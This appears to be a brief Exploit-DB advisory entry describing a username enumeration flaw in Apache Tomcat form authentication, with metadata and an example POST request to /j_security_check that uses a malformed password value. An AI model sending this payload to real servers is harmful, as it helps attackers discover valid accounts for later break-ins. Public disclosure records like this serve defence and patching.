Apache Tomcat - Form Authentication 'Username' Enumeration

EDB-ID:

9995

CVE:

N/A




Platform:

Multiple

Date:

2009-11-09


Attackers can use readily available tools to exploit this issue.

The following example POST data is available:

POST /j_security_check HTTP/1.1
Host: www.example.com

j_username=tomcat&j_password=%